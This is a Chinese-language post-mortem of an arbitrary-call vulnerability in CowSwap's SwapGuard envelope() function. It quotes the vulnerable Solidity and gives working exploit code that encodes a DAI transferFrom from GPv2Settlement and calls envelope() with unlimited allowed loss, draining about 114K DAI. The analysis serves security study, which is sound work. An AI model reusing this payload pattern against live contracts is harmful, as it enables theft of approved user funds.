CowSwap任意代码执行漏洞

说明

基本信息

Attacker: 0xc0e82c1ed4786f8b7f806d1b8a6335ec485266ff
Attack Contract: 0xeb8f71a5669a55cf90e384c77e74c4bdf9ae7754
Vulnerable Contract Name: CowSwap
Vulnerable Contract:
- 0xcD07a7695E3372aCD2B2077557DE93e667B92bd8
Attack Tx：
- https://etherscan.io/tx/0x90b468608fbcc7faef46502b198471311baca3baab49242a4a85b73d4924379b
LOSS: 114K

漏洞函数

envelope

/// @notice Performs a series of interactions and checks that vault received at least the expected amount of tokens
/// @param interactions Array of interactions to perform
/// @param vault Address of the vault
/// @param tokens Array of tokens to check
/// @param tokenPrices Array of prices of tokens
/// @param balanceChanges Array of expected balance changes
/// @param allowedLoss Maximum amount of tokens that can be lost
function envelope(
    Data[] calldata interactions,
    address vault,
    IERC20[] calldata tokens,
    uint256[] calldata tokenPrices,
    int256[] calldata balanceChanges,
    uint256 allowedLoss
) public payable {
    unchecked {
        // save all current balances of tokens
        uint256[] memory balancesBeforeInteractions = new uint256[](tokens.length);
        for (uint256 i = 0; i < tokens.length; i++) {
            balancesBeforeInteractions[i] = tokens[i].balanceOf(vault);
        }

        for (uint256 i = 0; i < interactions.length; i++) {
            Data memory interaction = interactions[i];
            // solhint-disable-next-line avoid-low-level-calls
            (bool success, bytes memory returnData) = interaction.target.call{value: interaction.value}(interaction.callData);
            if (!success) {
                revert BadInteractionResponse(returnData);
            }
        }

        uint256 totalLoss = 0;
        // check that we didn't loose more than allowedLoss
        // it is okay if we got more than expected
        for (uint256 i = 0; i < tokens.length; i++) {
            uint256 balanceAfterInteraction = tokens[i].balanceOf(vault);
            int256 expectedBalanceChange = balanceChanges[i];
            int256 actualBalanceChange = balanceAfterInteraction.toInt256() - balancesBeforeInteractions[i].toInt256();
            if (actualBalanceChange < expectedBalanceChange) {
                totalLoss += (expectedBalanceChange - actualBalanceChange).toUint256() * tokenPrices[i];
            }
            if (totalLoss > allowedLoss) {
                revert LostMoreThanAllowed(totalLoss, allowedLoss);
            }
        }
    }
}

着重关注参数Data[] calldata interactions。进入到函数内部，最终执行了如下的代码：

1	(bool success, bytes memory returnData) = interaction.target.call{value: interaction.value}(interaction.callData);

从参数传入到最终的代码执行，中间没有任何的过滤和校验，就是一个很明显的任意代码执行漏洞了。

攻击分析

Victim

攻击手法和其他的任意代码执行的漏洞一样，找到一个授权给当前漏洞合约的用户，计算出授权的代币数量。

address GPv2Settlement = 0x9008D19f58AAbD9eD0D60971565AA8510560ab41;
uint256 amount = DAI.balanceOf(GPv2Settlement);
if (DAI.allowance(GPv2Settlement, address(swapGuard)) < amount) {
    amount = DAI.allowance(GPv2Settlement, address(swapGuard));
}

最终计算得到的数量是：114824890807160711319588。

callDatas

接下来就是构造核心的payload。

bytes memory callDatas =
    abi.encodeWithSignature("transferFrom(address,address,uint256)", GPv2Settlement, address(this), amount);
SwapGuard.Data[] memory interactions = new SwapGuard.Data[](1);
interactions[0] = SwapGuard.Data({target: address(DAI), value: 0, callData: callDatas});

核心payload的构造就是将受害者(GPv2Settlement)授权到当前合约中的DAI全部转移到攻击者的地址中。

envelope

除了callDatas，调用envelope()函数还需要其他的参数，所以就需要构造其他的参数，最终调用envelope();

bytes memory callDatas =
    abi.encodeWithSignature("transferFrom(address,address,uint256)", GPv2Settlement, address(this), amount);
SwapGuard.Data[] memory interactions = new SwapGuard.Data[](1);
interactions[0] = SwapGuard.Data({target: address(DAI), value: 0, callData: callDatas});
address vault = address(this);
IERC20[] memory tokens = new IERC20[](1);
tokens[0] = DAI;
uint256[] memory tokenPrices = new uint256[](1);
tokenPrices[0] = 0;
int256[] memory balanceChanges = new int256[](1);
balanceChanges[0] = 0;
uint256 allowedLoss = type(uint256).max;
swapGuard.envelope(interactions, vault, tokens, tokenPrices, balanceChanges, allowedLoss);

分析实际的调用过程：

最终调用了DAI.transferFrom()，将受害者的DAI全部转移到了攻击者的地址。

获利

通过实际的分析，攻击者最终获利114824数量的DAI。

参考

https://twitter.com/MevRefund/status/1622793836291407873

https://twitter.com/peckshield/status/1622801412727148544